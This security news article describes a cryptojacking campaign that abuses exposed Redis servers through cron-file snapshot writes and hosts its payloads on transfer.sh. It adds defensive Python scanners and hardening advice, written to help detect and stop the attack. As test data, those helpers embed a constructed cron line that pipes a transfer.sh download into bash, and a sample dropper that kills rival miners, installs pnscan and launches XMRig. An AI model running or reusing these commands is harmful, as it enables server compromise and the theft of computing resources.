Cado Labs’ security researchers recently discovered a new cryptojacking campaign that specifically targets vulnerable Redis deployments. The campaign’s distinguishing feature is its use of transfer[.]sh, a free, open-source, command-line-friendly file sharing service, to host its payloads. Although the service has been in operation for several years, its use for malware distribution has so far been rare.
Cado Labs’ telemetry now shows a shift in that trend, with an increase in the service’s use observed since the beginning of 2023. The reason is unclear, but one plausible motive is evading detections that key on well-known code hosting domains such as pastebin.com.
Cado Labs has analyzed a number of malware campaigns targeting cloud systems and found that shell scripts are the dominant delivery mechanism, particularly in cryptojacking campaigns. These scripts rely heavily on the standard Linux download utilities (curl and wget) to retrieve further payloads, and a service such as transfer[.]sh, which is designed to be used from exactly those tools, may become a practical long-term alternative to platforms like Pastebin.
Initial Access
The attackers gained initial access by exploiting a vulnerable (typically internet-exposed and unauthenticated) Redis deployment. They stored a crontab entry as a value in the data store, then altered Redis’s persistence settings so that the database snapshot was written into a directory that cron reads. Because the cron daemon parses every file in that directory line by line and ignores lines it cannot interpret, the binary snapshot data is skipped while the embedded crontab entry is accepted as valid, giving the attackers arbitrary command execution on the host.
The same technique has previously been used by other cryptojacking groups, including TeamTNT and WatchDog.
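As an added example (a defender’s helper written for this page, not code from the Cado Labs report or from the campaign), the Python below performs the two checks a practitioner would want for this technique: it inspects cron directories for files whose header is the Redis RDB magic and pulls any crontab-looking lines out of them, and it judges a Redis instance’s `dir` and `dbfilename` settings for persistence paths that land in a cron directory or an SSH `authorized_keys` location. The cron directory list, the snapshot bytes written by `demo()` and the transfer.sh URL they contain are constructed for the example.

```python
import os
import re
import tempfile

# Every RDB snapshot starts with this magic followed by a version number.
RDB_MAGIC = b"REDIS"

# Directories cron reads; a snapshot redirected here via CONFIG SET dir/dbfilename
# becomes a crontab file as far as the cron daemon is concerned.
CRON_DIRS = ("/var/spool/cron", "/var/spool/cron/crontabs", "/etc/cron.d")

# Five schedule fields, then a command. The binary RDB bytes around the planted
# value do not match, so this pulls out just the crontab line(s) the attacker stored.
CRON_LINE = re.compile(rb"^[*\d,/\-]+(?:[ \t]+[*\d,/\-]+){4}[ \t]+\S.*$", re.M)


def extract_cron_lines(blob: bytes) -> list:
    """Return crontab-looking lines embedded anywhere in the given bytes."""
    return [m.decode("latin-1") for m in CRON_LINE.findall(blob)]


def scan_cron_dirs(dirs=CRON_DIRS) -> list:
    """Flag files under cron directories whose header is the Redis RDB magic."""
    findings = []
    for directory in dirs:
        if not os.path.isdir(directory):
            continue
        for name in sorted(os.listdir(directory)):
            path = os.path.join(directory, name)
            if not os.path.isfile(path):
                continue
            with open(path, "rb") as fh:
                blob = fh.read()
            if blob.startswith(RDB_MAGIC):
                findings.append({"path": path, "cron_lines": extract_cron_lines(blob)})
    return findings


def risky_persistence_config(config: dict) -> list:
    """Judge the values of CONFIG GET dir / dbfilename for abuse of snapshot persistence."""
    reasons = []
    snapshot_dir = config.get("dir", "")
    filename = config.get("dbfilename", "")
    if any(snapshot_dir.rstrip("/") == c or snapshot_dir.startswith(c + "/") for c in CRON_DIRS):
        reasons.append("dir points into a cron directory: " + snapshot_dir)
    if snapshot_dir.rstrip("/").endswith("/.ssh") or filename == "authorized_keys":
        reasons.append("persistence targets an SSH authorized_keys location")
    if filename and not filename.endswith(".rdb"):
        reasons.append("dbfilename does not look like a snapshot file: " + filename)
    return reasons


def demo() -> list:
    """Write a constructed (not captured) RDB-like file into a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        # Header, a fake aux field, then the planted value: cron skips the
        # surrounding binary lines and honours the one well-formed entry.
        snapshot = (b"REDIS0009\xfa\tredis-ver\x055.0.7\xfe\x00\x00\x01k"
                    b"\n\n*/2 * * * * curl -s https://transfer.sh/EXAMPLE/x | bash\n\n\xff")
        with open(os.path.join(tmp, "root"), "wb") as fh:
            fh.write(snapshot)
        with open(os.path.join(tmp, "legit"), "wb") as fh:
            fh.write(b"0 3 * * * /usr/local/bin/backup.sh\n")
        return scan_cron_dirs((tmp,))


if __name__ == "__main__":
    for finding in demo():
        print(finding["path"], finding["cron_lines"])
```

Feed `risky_persistence_config` the output of `redis-cli CONFIG GET dir` and `CONFIG GET dbfilename` from a live instance. Prevention is cheaper than detection here: keep `protected-mode yes` in redis.conf, bind to non-public interfaces, require authentication (`requirepass`, or ACLs on Redis 6 and later), and neutralize the primitive itself by disabling or restricting the CONFIG command (for example `rename-command CONFIG ""`).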
Technical Analysis
Once on the compromised system, the malware’s primary goal is to mine cryptocurrency, so the script first runs a series of preparatory steps to maximize the hardware resources available to the miner.
As part of this, the script runs the Linux “sync” command, which makes the kernel flush dirty file-system buffers from memory to disk; this is the standard precaution before dropping cached pages to free memory for the miner.
The payload is a shell script that acts as a precursor to the XMRig cryptocurrency miner. Before launching the miner, it performs several preliminary actions, including:
- Freeing up memory
- Shutting down rival mining programs
- Installing a network scanning tool known as pnscan
The script then generates a custom XMRig configuration and writes it to disk. This configuration tells the miner which mining pools to connect to, including fallbacks if one pool is unreachable.
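As an added example (a triage helper written for this page, not code from the Cado Labs report or the campaign), the Python below applies the checks an analyst would run on a dropper of this kind: it flags the sync/drop_caches memory flush, the pnscan installation and the rival-miner kills, lists the download URLs and their hosting domains, and parses any XMRig-style configuration the script writes through a heredoc so the pool endpoints and wallet can be extracted for blocking. The embedded `SAMPLE_SCRIPT` is constructed to mirror the behaviour described above; its paths, pool hosts, wallet string, process names and transfer.sh URL are placeholders.

```python
import json
import re
from urllib.parse import urlparse

# Constructed sample modelled on the behaviour the article describes (flush caches,
# kill rivals, install pnscan, fetch XMRig from transfer.sh, write a config). It is
# NOT the real dropper; paths, pool hosts and the wallet string are placeholders.
SAMPLE_SCRIPT = r"""#!/bin/bash
sync && echo 3 > /proc/sys/vm/drop_caches
pkill -9 minerd; pkill -9 xmr-stak; killall -9 minerd
apt-get install -y pnscan || yum install -y pnscan
curl -s https://transfer.sh/EXAMPLE/xmrig -o /tmp/.x/xmrig
cat > /tmp/.x/config.json <<'EOF'
{"autosave": true,
 "cpu": {"enabled": true, "huge-pages": true},
 "pools": [
   {"url": "pool.example.net:3333", "user": "WALLET_EXAMPLE", "pass": "x", "tls": false},
   {"url": "backup.example.org:443", "user": "WALLET_EXAMPLE", "pass": "x", "tls": true}
 ]}
EOF
nohup /tmp/.x/xmrig -c /tmp/.x/config.json >/dev/null 2>&1 &
"""

URL_RE = re.compile(r"https?://[^\s'\"|;]+")
KILL_RE = re.compile(r"\b(?:pkill|killall)\b(?:\s+-\d+)?\s+([\w.\-]+)")
# `cat > PATH <<'TAG' ... TAG` heredocs; the body is captured up to the terminator line.
HEREDOC_RE = re.compile(r"cat\s*>\s*(\S+)\s*<<-?\s*'?(\w+)'?\n(.*?)\n\2\n", re.S)
PKG_RE = re.compile(r"\b(?:apt-get|apt|yum|dnf|apk)\b.*\bpnscan\b")
# sync followed by a page-cache drop (or the reverse order) anywhere in the script.
FLUSH_RE = re.compile(r"\bsync\b.*drop_caches|drop_caches.*\bsync\b", re.S)


def download_urls(script: str) -> list:
    """Unique download URLs in order of first appearance."""
    return list(dict.fromkeys(URL_RE.findall(script)))


def kill_targets(script: str) -> list:
    """Unique process names passed to pkill/killall (rival miners being evicted)."""
    return list(dict.fromkeys(KILL_RE.findall(script)))


def heredoc_files(script: str) -> dict:
    """Map each heredoc-written path to the text the script writes there."""
    return {path: body for path, _tag, body in HEREDOC_RE.findall(script)}


def xmrig_pools(config: dict) -> list:
    """(url, wallet, tls) for each pool entry in an XMRig-style config."""
    return [(p.get("url"), p.get("user"), bool(p.get("tls"))) for p in config.get("pools", [])]


def triage(script: str) -> dict:
    """Summarize the indicators described in the article for one dropper script."""
    pools = []
    for path, body in heredoc_files(script).items():
        try:
            pools.extend(xmrig_pools(json.loads(body)))
        except json.JSONDecodeError:
            continue  # not a JSON config (e.g. a second-stage shell script)
    urls = download_urls(script)
    return {
        "flushes_caches": bool(FLUSH_RE.search(script)),
        "installs_pnscan": bool(PKG_RE.search(script)),
        "download_urls": urls,
        "hosting_domains": sorted({urlparse(u).hostname for u in urls}),
        "kill_targets": kill_targets(script),
        "pools": pools,
    }


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_SCRIPT), indent=2))
```

The pool URLs and wallet from `triage()["pools"]` are the most durable indicators: the transfer.sh link is disposable, but the miner must reach its pool, so egress blocks on the pool host and port, and alerts on Stratum traffic from servers, catch the payload even when the hosting domain changes.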
Redis servers have also been targeted by other threats in recent months, including Redigo and HeadCrab, and this campaign adds to that list.
Malware authors have long used free file and code hosting services to stage additional payloads, since such services give them anonymity, disposable infrastructure and flexibility.
The primary objective of this campaign is clearly to hijack computing resources for cryptocurrency mining. That said, an infection may also carry unintended side effects for the compromised system beyond the loss of CPU time, which should not be overlooked when assessing impact.
Author: Balaji N